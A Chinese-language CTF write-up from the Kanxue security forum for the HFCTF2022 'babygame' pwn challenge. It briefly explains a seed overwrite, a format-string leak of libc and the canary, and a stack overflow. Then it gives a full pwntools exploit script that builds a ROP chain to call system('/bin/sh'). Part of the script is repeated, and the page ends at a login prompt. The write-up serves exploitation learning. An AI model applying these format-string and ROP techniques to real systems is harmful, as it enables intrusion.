[原创]【HFCTF2022】babygame-Pwn-看雪-安全社区|安全招聘|kanxue.com

[原创]【HFCTF2022】babygame

发表于: 2022-4-28 18:28 13574

[原创]【HFCTF2022】babygame

Nameless_a 活跃值

2022-4-28 18:28

13574

（1）调用函数和被调用函数的canary的值是一样的

（2）fmt需要事先在栈上设置修改位置

从栈帧中可以看出srand的seed———v5是可以被我们覆盖而修改的，那么我们可以外接linux（windows和linux对同样的seed跑出的随机不太一样）上跑好的随机数达到绕过随机数检测的目的

不仅如此，栈上还放了一些残留的进程，我们可以利用这个来leak进程的基地址

简单的绕过随机数，攻防世界的入门题了属于是

明显的字符串格式化漏洞，可以用它泄露libc，canary和fmt修改栈上内容（返回地址啥的）

通过金手指泄露libc和canary，同时fmt修改返回地址为main函数，然后main函数里面填补canary的同时栈溢出进行rop

#encoding: utf-8 2 
#!/usr/bin/python

import sys

from pwn import *

from LibcSearcher import *

from pwnlib.util.iters import mbruteforce

from hashlib import sha256

import base64

context.log_level='debug'

context.arch = 'amd64'

context.os = 'linux'

def proof_of_work(sh):

    sh.recvuntil(" == ")

    cipher = sh.recvline().strip().decode("utf8")

    proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')

    sh.sendlineafter("input your ????>", proof)
 
def z():

    gdb.attach(r)
 
r=process('./babygame')

libc=ELF('./libc-2.31.so')
 
##leak_proc_base

pd=0x108*'a'+0x30*'a'+'nameless'+'nameless'

r.sendafter("Please input your name:",pd)

r.recvuntil('namelessnameless')

elfbase=u64(r.recv(6).ljust(8,'\x00'))-0x1465

log.info('elfbase:'+hex(elfbase))
 
##set

read_addr=elfbase+0x14B6
 
##dao_ru_random

f=open('test','r')

a=['0']*100

for i in range(0,100):

    line=f.readline()

    line=line[:-1]

    a[i]=str(line)
f.close()

count=1

for i in range(0,100):

    r.recvuntil('round '+str(count))

    if a[i] == '1':

       r.sendline('2')

    if a[i] == '2':

       r.sendline('0')

    if a[i] == '0':

       r.sendline('1')

    count=count+1
 
##golden_finger

pd='%27$p%35$p'

pd+='%{}c%11$hn'.format((read_addr & 0xffff)-32)

pd=pd.ljust(0x28,'\x00')+'\x68'

r.sendafter("Good luck to you.\n",pd)

libcbase=int(r.recv(14),16)-(libc.sym['atoi']+20)

canary=int(r.recv(18),16)

log.success('libcbase:'+hex(libcbase))

log.success('canary:'+hex(canary))

log.success('read_addr:'+hex(read_addr))
 
##set

system=libcbase+libc.sym['system']

pdt=libcbase+0x23b72 ##pop_rdi_ret

ret=libcbase+0x22679

bin_sh=libcbase+libc.search('/bin/sh\x00').next()

rop=p64(pdt)+p64(bin_sh)+p64(ret)+p64(system)

pd=(0x120-0x18)*'a'+p64(canary)+0x18*'a'+rop
##z()

r.sendafter("Please input your name:",pd)

r.sendlineafter('round',str(1))
r.interactive()

#encoding: utf-8 2

#!/usr/bin/python

import sys

from pwn import *

from LibcSearcher import *

from pwnlib.util.iters import mbruteforce

from hashlib import sha256

import base64

context.log_level='debug'

context.arch = 'amd64'

context.os = 'linux'

def proof_of_work(sh):

sh.recvuntil(" == ")

cipher = sh.recvline().strip().decode("utf8")

proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() == cipher, string.ascii_letters + string.digits, length=4, method='fixed')

sh.sendlineafter("input your ????>", proof)

def z():

gdb.attach(r)

r=process('./babygame')

libc=ELF('./libc-2.31.so')

##leak_proc_base

pd=0x108*'a'+0x30*'a'+'nameless'+'nameless'

r.sendafter("Please input your name:",pd)

r.recvuntil('namelessnameless')

elfbase=u64(r.recv(6).ljust(8,'\x00'))-0x1465

log.info('elfbase:'+hex(elfbase))

登录后可查看完整内容